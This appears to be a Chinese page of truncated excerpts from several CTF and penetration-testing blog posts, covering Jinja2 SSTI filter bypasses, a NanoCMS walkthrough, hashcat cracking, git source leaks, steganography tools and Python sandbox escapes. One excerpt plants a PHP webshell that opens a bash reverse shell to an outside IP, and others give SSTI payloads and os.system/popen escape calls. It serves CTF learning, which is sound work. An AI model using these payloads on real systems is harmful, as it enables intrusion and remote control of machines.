CTF-BugKu-PWN 瑞士军刀

1.view_source，难度：1，方向：Web，题目来源:Cyberpeace-n3k0题目描述:X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。打开一看显示FLAGisnothere,右击鼠标果然没反应，估计是不想我们查看网页源代码。下意识按了一下F12（开发者工具），笑死直接出来了，最简......

最后编辑时间：2024-09-1309:23:09星期五利用python自动请求网页(面向CTF)前置知识：PythonHTMLBurp（或者任何一个你趁手的抓包软件）VSCode（或者任何一个你熟悉的编辑器）浏览器开发者模式（F12）POST请求和GET请求shell/cmd使用搭建web服务器基础为什么我们需要利用python来进......

这题是一个jinja2的ssti模板注入，经过测试过滤了_{{}}.[]''ospopengetitem输入{%print(lipsum|string|list)%}或者{%print(config|string|list)%}从这里面获取我们需要的字符获取下划线和空格{%setpop=dict(pop=1)|join%}{%setxia=(lipsum|string|list)|at......

暴露了很多端口80端口发现是nanocms、查询exploithttp://192.168.200.144/~andy/data/pagesdata.txt会暴露密码searchsploitnanocms那个根本利用不了的破解密码得出shannon进入cms添加一句话马，执行<?phpexec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.121/12340>......

可交互shellpython2-c'importpty;pty.spawn("/bin/bash")'mysql命令mysql-u-pshowdatabase;usexxxx退出exit/qawkcatsql|awk-F'''{print$2}'密码爆破hashcat-m0-a0passwd/usr/share/wordlists/rockyou.t......

一.常见编码转换（1）整数转ascii码INT->CHAR：chr(97)CHAR->INT：ord('a')（2）hex转ASCII>>>importbinascii>>>binascii.a2b_hex('666c6167')b'flag'>>>binascii.b2a_hex(b'flag')b'666c6167&......

这题用御剑扫描不出来什么结果，最后看大佬的wp发现这题使用githack扫出来的首先来收一下git源码泄露的原因：开发人员在开发的时候，常常会先把源码提交到远程托管网站（如github），最后在从远程托管网站把源码pull到服务器的web目录下，如果忘记把.git文件删除，就会造成此漏洞。利用.git......

前言#MISC题型多变而且工具繁杂，因此自己花时间整理了一份工具列表，以便日后参考用流畅地阅读这篇博客，你可能需要：Python2.7.18+Python3.8+任何一个更高版本的Python，使用conda管理Linux虚拟机，kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手......

文件操作与隐写文件类型识别 1.File命令当文件没有后缀名或者有后缀名而无法正常打开时，根据识别出的文件类型来修改后缀名即可正常打开文件。使用场景:不知道后缀名，无法打开文件。格式:filemyheart2.winhex通过winhex.程序中可以查看文件头类型，根据文件头类型判断出......

这些是一些绕过Python沙箱保护并执行任意命令的技巧。命令执行库首先，您需要知道是否可以直接使用已导入的某些库执行代码，或者是否可以导入以下这些库：os.system("ls")os.popen("ls").read()commands.getstatusoutput("ls")commands.getoutput("ls")commands.getsta......